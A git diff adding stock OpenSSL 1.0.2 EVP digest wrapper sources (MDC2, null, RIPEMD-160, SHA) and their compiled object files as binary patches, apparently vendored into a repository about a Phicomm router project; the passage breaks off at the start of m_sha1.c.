diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_mdc2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_mdc2.c
new file mode 100644
index 0000000..94e12a6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_mdc2.c
@@ -0,0 +1,108 @@
+/* crypto/evp/m_mdc2.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_MDC2
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/x509.h>
+# include <openssl/mdc2.h>
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+# endif
+
+# include "evp_locl.h"
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return MDC2_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return MDC2_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return MDC2_Final(md, ctx->md_data);
+}
+
+static const EVP_MD mdc2_md = {
+    NID_mdc2,
+    NID_mdc2WithRSA,
+    MDC2_DIGEST_LENGTH,
+    0,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_ASN1_OCTET_STRING_method,
+    MDC2_BLOCK,
+    sizeof(EVP_MD *) + sizeof(MDC2_CTX),
+};
+
+const EVP_MD *EVP_mdc2(void)
+{
+    return (&mdc2_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_mdc2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_mdc2.o
new file mode 100644
index 0000000000000000000000000000000000000000..fbfc6cde58394579442f82d0dbd0f9e90d26b98f
GIT binary patch
literal 2496
zcmb`ITTc^F5XYw!1q}jT5=k&-6ODl=n-+-%9!yK=EvcYTjEN>oDGM~xOWLiWJ^-(T
znD_zw06h8;O#C!H8XqLa1m}PD3>>%H7j=?zX3p=-%(?E_{d6JI7m1Kagr3lOODOA$
z=XOGw2^yhc`aW{|Xa4XcclaZJ)EN7U9-!ROey_&+3vl{^ipAlw#$}Yt{}4>`dLYpt
zw<iLOvZ>UZHL<$hu6b>1)_!Qmrs9v=su|y#j@hx9Ngw-x{j4xYOg_7~N_|A1!J=Fs
zH+)5rcgqyn9gU0+4GezZjYP~X-6!(`i)nU6Yp{h7_ENJUt$Qh)SwDR{4eO7FpD52=
zX8&hYlrsh8GJ`%NkGU3bY0G+UYJW>75{|uys9p3sc6C2g)ZhkYjuY&bC|&A?OrnI@
zc1x57y5L<V*!!T&F$m-79{hO^{)+iEUhx!bh@9gF+hO_ldvK~c)s6DBU8c=St+Ye!
z#zx6=sZy(WgbwZ{CtFyWPZpe|OlBorbc)IOLfWCH3#n-*qk@#V>PIR&kMQ)1XDT->
zuOyvTWvk{SR~F;WQmV*FR*K8{#jNUj>ozN!osdqfYX%hye;4Xhex3R<qA2br@q0le
zT)qi#?1S)0wjtnGxd<NvWWhbh7#0_ZrRsAo_fWof@z-vYF#N?AC}(i_mVqqIF(!(L
zxn6L|C3(c((gClv7B2UJ>{h4hmDX8%O<!+|)pU1Cw&(78Wb<K{$X;)?$W|0>Sa!2c
zcDY`yx;6Hy)jikd*J-NdmCA2)d#l#A8_jydZF(IY?QT1p%~I9XbNUx$aWMAS_&um}
z2~`u#YAp)Bri^m~XPq!1+c`j%HC6lH4Pxabko$0t8F=s|>*%<k3XcDP9gy>H;~#Ns
z*!Ty`A?EvrwuQ=&INM?CKi2D)c)T0<_XO9UVutZ!TueF9jr%5KTh=eSU@+75jyRYw
z#25D(uPW}fDHA&0G9lYCf59Fba1F-ibo{nBY8{NPGY{K83!BBVrfUEG;IAO@a(}|c
uM#v{U{)yK3e+`Gk;|~<PJB;X9!;fefqSKubym4Xi2YUW{XP&+hjQ<U)yuC^Q

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_null.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_null.c
new file mode 100644
index 0000000..017e1fe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_null.c
@@ -0,0 +1,98 @@
+/* crypto/evp/m_null.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return 1;
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return 1;
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return 1;
+}
+
+static const EVP_MD null_md = {
+    NID_undef,
+    NID_undef,
+    0,
+    0,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_NULL_method,
+    0,
+    sizeof(EVP_MD *),
+};
+
+const EVP_MD *EVP_md_null(void)
+{
+    return (&null_md);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_null.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_null.o
new file mode 100644
index 0000000000000000000000000000000000000000..dfb4952f9550203ebfbd95f08f7919de402fc26c
GIT binary patch
literal 2128
zcmc&!OKTKC5U$yYW|f$YA`*y%0UxZ7G`kuUJ;*|gSwTbs5f8#<b~ABT=dsMrz$ORv
z;8n=a@aWN_kY6NTM1)v1Q?==|or@kUn69d?>#MG=?w)t6Paahq2Sglr0EeES0DDu1
zcB?R3P=i_cUR(V6g$Vn{S?!M}D1N^n{kNfNuDrIga^I_Obn`gNy?g4mYAiMH=7rmQ
zd#j-u%hyV{B+~Zh@T0w~J>7r`z*oXt{7BB13Y^__aK>}a!pwAa5Box#i#&IlHDL`4
z_Rxa8U~Go<af*&$3celK=3VQFQteXxQI?CDOrhE<S{~U;jdAfsUtnDNA~^NJDY}RT
z%D7a;=xVqIW0ilL9><^3!zQ*1vf2dV`01kndYAD#hZQaI%%smzC(grA^<WSWGRTKp
zeip#?AofF`iB7ZytIwaID&pV@^YLB)RrTwjlzGPKd}vO@V?%JMxNhLmKZ&OtdY)yD
z7hLkR4P5fPG;rBBsL@W8`CZgmTI#-7X%PA<3&t5J?1B%fI~sv1Q1Z!AX`;fUhs{yF
zB#MF<W8)+X6uy<EQResFu>UH~)i6zlL7MGwj-cP!PW>q0%KlAxNT;5jG}5%#zi!|Z
ztIGm9bo*O6h<2Nwikv6i6XMFv6#OdV=F57GxJ}IUZ(<PT{9FDV<Wf$P{~j?C{k@Uz
z(V$5aZQK4gIicJu+CTjZ&HX<{jMkU`8=8guV10wNDA~X0b(|1eVn|=IftJ`VV)V-O
zH-awIneUOKiPSI9E*cbS^4rYsOCW2LpCfMT-zV<hCiAF&^j3v0_s6z2Q9jH1tj{1e
kYvI$s$2@z4V4gwqTsR$t6mk|v8^21MLitdt$!PL_1CDfhdjJ3c

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ripemd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ripemd.c
new file mode 100644
index 0000000..81de0ef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ripemd.c
@@ -0,0 +1,107 @@
+/* crypto/evp/m_ripemd.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_RIPEMD
+
+# include <openssl/ripemd.h>
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/x509.h>
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+# endif
+# include "evp_locl.h"
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return RIPEMD160_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return RIPEMD160_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return RIPEMD160_Final(md, ctx->md_data);
+}
+
+static const EVP_MD ripemd160_md = {
+    NID_ripemd160,
+    NID_ripemd160WithRSA,
+    RIPEMD160_DIGEST_LENGTH,
+    0,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    RIPEMD160_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(RIPEMD160_CTX),
+};
+
+const EVP_MD *EVP_ripemd160(void)
+{
+    return (&ripemd160_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ripemd.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ripemd.o
new file mode 100644
index 0000000000000000000000000000000000000000..551c239a87bdef7b10f056416aa1307e12caadf6
GIT binary patch
literal 2488
zcmbuB-%k@k5XYw!1q}kC4;T!&#Kb_9OREHf52pNRX_G1lVtg<;TR3PV{o(bh#Ru?F
zLQG8j2YmF=Kf%Pm#z*6WjWNOb?(MY8<@zF%?9I&QW@dM9_xA2EozL{eVk8oy2h{b1
z61C5D?UXW8G(yAlYh?0I?x>wT`kgzjkN?0OpzQHsFXw}*^j*~;YO;RA?W*?As?KwP
zE1@DO_Ddl~D@#lFt*Omov+6gkdHb%Nm`UDiDmQs>Ct)XMrvn@$_Olx0hQY5q+N3_B
zZ(wn55E*~$?K;I;qp^vhfx(abAdz!jMRdmnmeA~y)?mvK?3rdmTK7^|vwr${5_LZw
zxuO`mjQ(_1oGXO|{r4Gl<Qb1?F22m?n&uX3i110aW9lg?OsznvYuw-l=1~rsZpV((
zg^q0+ak^-_9Xn0~9b1fBY~b04Wr0Byf82u?d+=Ax$9TpwtRb?FhipgHf8T>s#qr8@
zx3X<-(N4Kq*rR5ByWqQ2u9kfYZYAduPGy^%mHg`BLf%=;WH!=IoF@y5`LsjpxwZ7e
zWrSo@de`3!3UxsaCDTvWbdQ`v>l+JBqr6*H#%tFr@9bkXM6-dy`=D0i?@1sdnqw!y
z7B24sIOZ>Wnr#U9Wp2X90a>uW(TBwiVySDF%l?}RaqUvd;1UazHMqRPK$hm{6HUaN
zFSyi_IudW`gy&idmwiBXW541TimZJv&?T`vcduakZp$Z|m$*Q7vC$w~QTVWIuSWJ(
ztx|ET996CPuFa>?Ov5j1z1040wQ1MATHW>heVy%=oE@)FarKzaqAX6vn&7-OC8eEt
z6S9q1QzqEKTBl41ACTpRx(4qHatF09`{5@0;NcTYZ%ZBBRpI_`^DWf;-~2hwjq3j$
zbBKAa!MAWRB*}Kv{6FjYOFqsEd~?F{Ut)&-6WmN`YX|3=DKdZ2dA=#O8FwQJM#N%Y
z<21#-Hf2iZTP9>%#xK}s1EJyktj;e<pw{918uO^<H?ICJPVXOl4J2RoPgLLN>Z|U*
otu?+|!x8!T@`U#eBl@D@Cpd=aavg#*E-JsJ$A8d?42*F8KUpojmjD0&

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha.c
new file mode 100644
index 0000000..e1e22e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha.c
@@ -0,0 +1,106 @@
+/* crypto/evp/m_sha.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA0)
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/x509.h>
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+# endif
+# include "evp_locl.h"
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return SHA_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return SHA_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return SHA_Final(md, ctx->md_data);
+}
+
+static const EVP_MD sha_md = {
+    NID_sha,
+    NID_shaWithRSAEncryption,
+    SHA_DIGEST_LENGTH,
+    0,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    SHA_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA_CTX),
+};
+
+const EVP_MD *EVP_sha(void)
+{
+    return (&sha_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha.o
new file mode 100644
index 0000000000000000000000000000000000000000..d0b4a6ca4eb72aafca11c99b85318e7e6add1276
GIT binary patch
literal 2456
zcmbuBTTc^F5XYx13K|5w#E@XjMiYY<Hbsew52giMN>ase3lGM1frU2GOSW4BJ^-(T
znD{Y#^dp$~CHx9L8Xs(o3C{oQnfADBUu2TAGxOUsb8fSz-Om;CJ*gClr06MiJfTG2
z&UEaIGBY$pgY<Lg`tP~JR^jm1+);hxJKg{lj`q7bA5^BVDhJVR)_1sF(f(=GSx#^{
zmL$V|DaL4aX6A`Kw!GG?hE03QdElhSCmuDGJF#~^?W8AfM>q=XWi`wVlb?ODOg%(j
zz$|VMnSbj20;P6_Q=<cY{U3QF5pzxT=*$Z&t=R>w!JZ|sRm}#p?xt{Nz4YTa>AjVB
zqL{nP{@*BzGsWc`gB~M~?D3H1;>&ujYHqWJ2p?rTrFKza+KH5US_U^T&$8ci+qOlR
z)k(4F{7J~fqP`RS1{3UkTplw>;?rID^Dcaa`6XWQIBSTU<7>8)@^5wFRB;<6&snF<
za@E_WW_`m8eJWSWAu)F=8|2Ow=cltpcRrtA%q_V~+38}=rNu(l&8rYt%TXB2IfUj`
zULq|mEN0zCd8?|7cYaXb+{I*BCL@J<SG)b^I1-#Y1eF3?xYRm0)+Zd_IRyM7H{m0I
zET~_MVRM7n>e=B^Ut=+@UCJ0-`T`XUF5f7StvSX-6EW8dF1aL+^tW}uE3JjgIg``a
zt%Tkh>oACPNvy!%_MFh)3CZD8^vGFjG{{jDJ}f7wk+WW_RQxLUs@6i^;ag|C5qj%y
zwZBzuI`yDd_k(a(NBbprGw>?Dp3`ZR&A~Vm+^42wv@>Nww$axVeCIgpj0xGc0a@Ot
zXY@TFR=#klhg;0R<2RJlr4Dba`1tqu4RZc({6mgS8vlSf#JsoQ+jtl<!FJO65A^ya
z9`^x$Q{wBNVTSS3+)Qa{=dKCami3D+8qDl^Q#zP1p)cwhw<YS@lrbG|n~-gpzu=G!
zbdARsbbLuVY8{WSF;CjRRzm&YwwHLRpQN!d)Mq_@OKbct4JO3nmnB|1jOdew0USeg
Wx;DWbmlVIM{{0Z`wR=WJJpM1>xw0$(

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha1.c
new file mode 100644
index 0000000..a74e6b7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha1.c
@@ -0,0 +1,235 @@
+/* crypto/evp/m_sha1.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_SHA
+
